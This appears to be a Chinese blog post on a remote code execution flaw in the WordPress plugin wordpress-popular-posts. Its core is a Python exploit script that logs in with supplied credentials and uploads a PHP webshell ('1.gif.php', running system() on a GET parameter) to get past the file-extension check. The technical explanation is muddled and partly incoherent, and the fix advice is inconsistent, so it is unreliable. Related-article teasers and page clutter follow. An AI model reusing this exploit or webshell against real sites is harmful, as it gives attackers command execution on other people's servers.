WordPress插件流行帖子远程代码执行加脚本编写

最新推荐文章于 2024-04-23 01:00:04 发布
最新推荐文章于 2024-04-23 01:00:04 发布
阅读量443 收藏
点赞数 1
文章标签: wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32445755/article/details/118938637
版权

前言

WordPress大家应该都熟悉,好多博客用的都是wordpress,而它也是漏洞不断,今天我给大家带来的是最新发现的WordPress插件漏洞,看这篇文章的白帽们如果对之前的WordPress漏洞完全不懂的话可能会有点懵,我也会带大家写一下脚本。

漏洞分析

利用条件:
插件:wordpress-popular-posts
利用插件的话必须是登录状态,我们之前对一wordpress系统做了灰盒测试,是个大站,甲方并没有给密码,不过给了几个插件

应甲方的要求,我们如果找出漏洞,还要有相应的测试脚本(可能是不放心吧,要自己测试),此漏洞需要五个条件,分别是ip,端口,路径,用户名,密码
所以第一步:

 

  1. my_parser = argparse.ArgumentParser(des cription='Wordpress Popular ')
  2. my_parser.add_argument('-t', help='--Target IP', m etavar='IP', type=str, required=True, dest="target_ip")
  3. my_parser.add_argument('-p', help='--Target port', type=str, m etavar='PORT', default='80', dest="target_port")
  4. my_parser.add_argument('-w', help='--Wordpress path (ie. /wordpress/)',m etavar='PATH', type=str, required=True, dest="wp_path")
  5. my_parser.add_argument('-U', help='--Username', m etavar='USER', type=str, required=True, dest="username")
  6. my_parser.add_argument('-P', help='--Password', m etavar='PASS', type=str, required=True, dest="password")
  7. args = my_parser.parse_args()
  8. target_ip = args.target_ip
  9. target_port = args.target_port
  10. wp_path = args.wp_path
  11. username = args.username
  12. password = args.password
 

共五个条件。
 原理:
 使用提供的凭据登录,创建一个新的post,并添加一个自定义字段,其中包含指向webshell,它将由服务器自动下载。
 wordpress-popular-posts的执行流程:
 WordPress读取此文件以在插件中生成插件信息
 

*行政区。这个文件还包括插件使用的所有依赖项,
 

*注册激活和停用函数,并定义一个函数
 

*启动插件

 可以看出插件信息绑定在了admin_notices。
 接着我们去找它的上传处,在这里

 插件的image.php定义了上传图片的控制器,图片最终还是传给了wordpress-popular-posts,整个漏洞上传流程已经完毕。
 

漏洞利用(脚本)
 

wordpress会对上传文件名后第一个后缀进行检测,所以我们上传1.gif.php
 

 

  1. shell_name = '1.gif.php'
  2. payload = 'GIF <!DOCTYPE html>
  3. <html lang="en">
  4. <head>
  5. <m eta charset="UTF-8">
  6. <title>Title</title>
  7. </head>
  8. <body>
  9. <form method="GET" name="<?php echo b asename($_SERVER['PHP_SELF']); ?>">
  10. <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
  11. <input type="SUBMIT" value="Execute">
  12. </form>
  13. <pre>
  14. <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>
  15. </pre>
  16. </body>
  17. </html>'
  19. file_json = requests.post('http://'+target_ip + ':' + target_port+'/src/image.php', files={ 'file' : (shell_name, payload)})
  20. resp = json.loads(file_json.text)
  21. if resp['status']:
  22. urlshort = resp['data']['file']['url']['full']
  23. else:
  24. print(f'[-] Error:'+ resp['error']['message'])
  25. exit()
  27. file_uploaded_site = requests.get(urlshort).text
  28. PHP_URL = re.findall(r"(https?://\S+)("+shell_name+")",file_uploaded_site)[0][0] + shell_name
 

注意一定要用json.loads将json格式的文件转换成字典的形式(因为我们要判断是否上传成功),最后我们登录并把会话信息发出去
 

 

  1. session = requests.Session()
  2. auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
  4. header = {
  5. 'Host': target_ip,
  6. 'User-Agent': 'Monies Browser 1.0',
  7. 'Accept': 'text/html,application/xhtml+x ml,application/x ml;q=0.9,image/webp,*/*;q=0.8',
  8. 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
  9. 'Accept-Encoding': 'gzip, deflate',
  10. 'Content-Type': 'application/x-www-form-urlencoded',
  11. 'Origin': 'http://' + target_ip,
  12. 'Connection': 'close',
  13. 'Upgrade-Insecure-Requests': '1'
  14. }
  16. body = {
  17. 'log': username,
  18. 'pwd': password,
  19. 'wp-submit': 'Log In',
  20. 'testcookie': '1'
  21. }
 

下面是甲方的脚本执行结果
 

结论
 

WordPress读取wordpress-popular-posts插件并没有去验证此插件信息的安全性,经过验证即使是现在WordPress也并没有对wordpress-popular-posts做出修改,5.7.2不过加了对此插件的验证,所以现在的解决方法就是将WordPress升级到最新5.7.2,我个人建议还是不要去用wordpress-popular-posts上传文件了。

                

        

        

    




    

      

        

            

              
                
                  qq_1136014935
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    1
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  2
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
wordpress安装脚本

				
			

			

				

					六道对穿肠的学习之旅
				

				

					05-28
					
					186
					
				

			

		

		

			
				
代码wordpress安装脚本

			
		

	



                

              
                



	

		

			

				
					
Shell脚本实例:基于WordPress一键部署个人博客脚本 ——CentOS 7

				
			

			

				

					qq_52884581的博客
				

				

					07-06
					
					547
					
				

			

		

		

			
				
在CentOS 7平台上基于WordPress的个人博客一键部署

			
		

	



                


  
              

                


	

		

			

				
					
WordPress 件存在漏洞,500 万网站面临严重安全风险

				
			

			

				

					dzqxwzoe的博客
				

				

					04-20
					
					1158
					
				

			

		

		

			
				
网络安全研究人员近期发现 WordPress LiteSpeed Cache 件中存在一个安全漏洞,该漏洞被追踪为CVE-2023-40000,未经身份验证的威胁攻击者可利用该漏洞获取超额权限。!small?LiteSpeed Cache 主要用于提高网站性能,据不完全统计已经有 500 多万安装用户。Patchstack 研究员 Rafie Muhammad 表示,LiteSpeed Cache。

			
		

	





	

		

			

				
					
linux下shell脚本实现wordpress搭建

					
最新发布

				
			

			

				

					高性价比服务器就选:蓝易云
				

				

					04-23
					
					143
					
				

			

		

		

			
				
在Linux环境下,我们可以通过Shell脚本来自动化安装和配置WordPress。以下是一个简单的步骤,包括安装必要的软件包、创建数据库、下载和配置WordPress。以上就是在Linux下通过Shell脚本实现WordPress搭建的步骤。首先,我们需要在Linux服务器上安装Apache、MySQL和PHP。接下来,我们需要创建一个新的MySQL数据库以及用户,并授予该用户对新数据库的所有权限。在生产环境中部署WordPress时,请确保对系统进行适当的安全配置。

			
		

	



		

			
		



	

		

			

				
					
Wordpress开源博客系统部署及脚本

				
			

			

				

					秦子腾
				

				

					10-12
					
					364
					
				

			

		

		

			
				
[root@qinziteng ~]# cat wordpress_install.sh 
#!/bin/bash
clear
## variabled
WORDPRESS_VERSION='5.5.6'
DB_ROOT_PWD='123.com'
DB_USER='lisi'
DB_USER_PWD='123.com'
DB_NAME='blog'

## function
echo "Please wait a few minutes..."
word_yum(){
(firewall-cmd --ad

			
		

	





	

		

			

				
					
热门文章Wordpress Popular Posts2.0.3汉化中文包件 for W.zip

				
			

			

				

					07-14
				

			

		

		

			
				
WordPress 热门文章Wordpress Popular Posts2.0.3汉化中文包
作者:Héctor Cabrera

Wordpress Popular Posts是一个显示在您的博客最受欢迎的日志工具挂件。你还可以用它作为模板标签。
重要提醒:从版本2.0开始,Wordpress Popular Posts需要至少要是WordPress2.8版本才能正常工作。如果你当前没有运行WordPress 2.8版本或是无法更新您的博客,请不要升级或安装2.x版本!
警告:如果您是从任何1.4.6之前的版本升级,请先升级到1.4.6然后再转到2.X!
最新更新
Wordpress Popular Posts现已支持多挂件!在你的侧栏安装多个Wordpress Popular Posts实例,并分别独立设置!
简码支持! – 从版本2.0开始,您还可以在页面上展示你最受欢迎的日志!
WP-Cache和WP Super Cache 现已支持!从版本2.0起,Wordpress Popular Posts完全兼容缓存件!
分类排斥 – 要在表单上排除某些分类?使用排除分类设置!
新增WP-PostRatings投票支持!向访客显示您的读者如何评价该篇文章!
数据库改进 – Wordpress Popular Posts 现使用更少的空间来缓存您最热门的日志模板标签! – 不喜欢小工具栏?没问题!您仍然可以使用get_mostpopular()模板标签在你的主题中嵌入最热门的内容。此外,一个新的标签已被列入此版本:


使用方法:
下载汉化包解压后上传到/wp-content/plugins/wordpress-popular-posts/上目录即可
Wordpress Popular Posts2.0.3汉化中文包截图:

			
		

	





	

		

			

				
					
WordPress常用件以及件常用代码

				
			

			

				

					01-20
				

			

		

		

			
				
关键字描述:常用 代码 以及 &mdash 文章 即可 &nbsp 然后 统计  这篇文章是我之前为一个香港人做兼职的时候为他写的,因为合作不愉快所以也没继续做下去。现在把这个文档贡献出来,相信对于新手朋友接触...

			
		

	





	

		

			

				
					
Wordpress常用件以及件常用代码

				
			

			

				

					09-29
				

			

		

		

			
				
关键字描述:常用 代码 以及 &mdash 文章 即可 &nbsp 然后 统计 这篇文章是我之前为一个香港人做兼职的时候为他写的,因为合作不愉快所以也没继续做下去。现在把这个文档贡献出来,相信对于新手朋友接触...

			
		

	





	

		

			

				
					
编写PHP脚本清除WordPress头部冗余代码的方法讲解

				
			

			

				

					12-19
				

			

		

		

			
				
wordpress头部的代码非常多,包括WordPress版本,前后文、第一篇文章、主页meta信息等各种冗余代码,这些对博主来说是没有意义的,也对网站的安全有一定的影响,也一度不知道这些代码是有什么作用、怎么来的和怎么...

			
		

	





	

		

			

				
					
WordPress件和主题编写时cookie应如何设置

				
			

			

				

					01-20
				

			

		

		

			
				
编写WordPress件和主题的时候,经常需要用到cookie,比如存取用户状态等,我之前编写件Ludou Simple Vote就用cookie来记录用户投票时间,以实现简单的防止重复投票功能。 但是如果你在WordPress主题文件中直接...

			
		

	





	

		

			

				
					
WordPress 5.0.0远程代码执行漏洞研究.pdf

				
			

			

				

					09-09
				

			

		

		

			
				
WordPress 5.0.0 远程代码执行漏洞研究》这篇文章主要探讨了在互联网高速发展的背景下,Web应用程序的安全问题日益突出。随着开源软件的广泛应用,其安全性问题引起了安全从业者们的广泛关注。开源软件在当前网络...

			
		

	





	

		

			

				
					
Wordpress Popular Posts

				
			

			

				

					10-16
				

			

		

		

			
				
为了防止曾经的热文被淹没掉,博主最好添一个热文排行榜,让博客中的那些流行度比较高的文章,持续它们的价值,所以,很有必要安装热文排行件,通过这个件,你可以自定义显示类别、标题、链接数以及显示的评论数。

Wordpress Popular Posts件安装使用也十分的方便,下载Wordpress Popular Posts件,将压缩包解压后,把文件夹上传到wp-content/plugins/目录下,登录WordPress管理后台,点击“Plugins”找到上传的件,激活该件,可以在“Appearance”--->“Widgets”中把它添到侧栏中去,如下图:





件的选项,基本上就如上图了,在Time Range中你可以根据自己的情况选择,热文的时间范围,范围如下:
Today:今天

•Last 7 days:最近7天
•Last 30 days:最近30天
•All-times:所有时间的
这些设置可以把我们的热文排行展现的更全面。

•Sort posts by选择中,我们可以选择排序的方式:
•Comments:评论
•Total views:总浏览量
•Avg.daily views:平均日浏览量
出来这些,你还可以选择文章显示的分类、Tag显示的方式等等,也不需特别的设置,只要在前面勾选就OK了。

最后,就是HTML格式的设置了,你可以自定义HTML样式,也可以使用默认的样式,根据自己的选择,设置好后点击Save保存就OK了

			
		

	





	

		

			

				
					
wordpress-popular-posts:WordPress热门帖-高度可定制的WordPress小部件,显示您最受欢迎的帖

				
			

			

				

					02-05
				

			

		

		

			
				
WordPress热门帖
一个高度可定制的小部件,显示您最受欢迎的帖。
目录
描述
WordPress Popular Posts(从现在开始,仅WPP )是一个高度可定制的用于显示支持的网站上评论最多/查看最多的条目。
产品特点
支持多窗口小部件-您的博客上可以有多个WordPress Popular Posts小部件,每个小部件都有自己的设置!
 时间范围-列出您博客中在特定时间范围内最受欢迎的帖(例如,过去24小时,过去7天,过去30天等)!
 自定义帖类型支持-除了展示帖和页面外,还想展示其他内容。 热门产品? !
 缩图! -显示您的帖的缩略图! (有关更多详细信息,请参

			
		

	





	

		

			

				
					
most-popular-posts热文排行

				
			

			

				

					10-16
				

			

		

		

			
				
WordPress自带的有最新文章功能,它可以让访客第一时间访问到博主刚刚发布的文章,但是,当我们的博客文章增到一定程度后,那些曾经非常有价值的文章就被淹没了,为了防止曾经的热文被淹没掉,博主最好添一个热文排行榜,让博客中的那些流行度比较高的文章,持续它们的价值。

那么,就看看今天介绍的件吧!most-popular-posts热文排行件,通过这个件,你可以自定义显示类别、标题、链接数以及显示的评论数。

most-popular-posts件安装使用也十分的方便,下载most-popular-posts件,将压缩包解压后,把文件夹上传到wp-content/plugins/目录下,登录WordPress管理后台,点击“Plugins”找到上传的件,激活该件,可以在“Appearance”--->“Widgets”中把它添到侧栏中去,如下图:



在图中件功能基本上都进行了说明,如果你希望在侧栏以为的其它地方显示热文排行,你可有在需要添的模版中入<?php most_popular(); ?>代码即可。

			
		

	





	

		

			

				
					
SHELL脚本在线部署博客系统 wordpress

				
			

			

				

					cyx1834265118的博客
				

				

					09-11
					
					443
					
				

			

		

		

			
				
部署博客系统wordpress
1.运行脚本
#!/bin/bash
#准备环境
sed  -ri '/^SELINUX=/cSELINUX=disabled'    /etc/selinux/config
setenforce 0
systemctl  stop  firewalld
systemctl  disable  firewalld
#安装LAMP环境
rpm -q  httpd
if [  $? -eq  0 ]
then
yum -y install httpd mariadb-server

			
		

	





	

		

			

				
					
漏洞复现 wordpress 远程代码执行 (CVE-2016-10033)

				
			

			

				

					weixin_48900801的博客
				

				

					07-25
					
					1250
					
				

			

		

		

			
				
漏洞复现 wordpress 远程代码执行 (CVE-2016-10033)
名称:
WordPressWordpress基金会的一套使用PHP语言开发的博客平台。WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击

			
		

	





	

		

			

				
					
html 设置流星效果,如何使用html实现流星雨的效果(代码

				
			

			

				

					weixin_30199299的博客
				

				

					06-03
					
					3973
					
				

			

		

		

			
				
本篇文章给大家带来的内容是关于如何使用html实现流星雨的效果(代码),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。流星雨body {margin: 0;overflow: hidden;}//获取画板//doccument 当前文档//getElement 获取一个标签//ById 通过Id名称的方式//var 声明一片空间//var canvas 声明一片空间的名字叫做can...

			
		

	





	

		

			

				
					
linux嵌入式远程代码执行漏洞,【漏洞预警】WordPress <4.7.1 远程代码执行漏洞(更新漏洞环境)...

				
			

			

				

					weixin_39978282的博客
				

				

					05-06
					
					717
					
				

			

		

		

			
				
【漏洞预警】WordPress <4.7.1 远程代码执行漏洞(更新漏洞环境)2017-05-06 14:42:18阅读:0次传送门关于WordPressWordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress虽为免费的开源软件,但其价值无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对博客的应用,W...

			
		

	





	

		

			

				
					
【转载】Readers’ Choice – Our 10 Most Popular ML Blog Posts of 2014

				
			

			

				

					weixin_34342578的博客
				

				

					01-19
					
					63
					
				

			

		

		

			
				
Readers’ Choice – Our 10 Most Popular ML Blog Posts of 2014

ML Blog Team
30 Dec 2014 10:15 AM



Comments1
Likes




We launched this blog in June 201...

			
		

	





	

		

			

				
					
远程代码执行攻击与防护实验怎么做

				
			

			

				

					04-02
				

			

		

		

			
				
2. 攻击代码编写编写一个包含远程代码执行漏洞的攻击代码,并将其上传至Web应用程序中。  3. 实施攻击:使用攻击代码向目标系统发送恶意请求,触发远程代码执行漏洞,获取目标系统的控制权。  4. 防护方案的实施...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 2

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
qq_1136014935

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值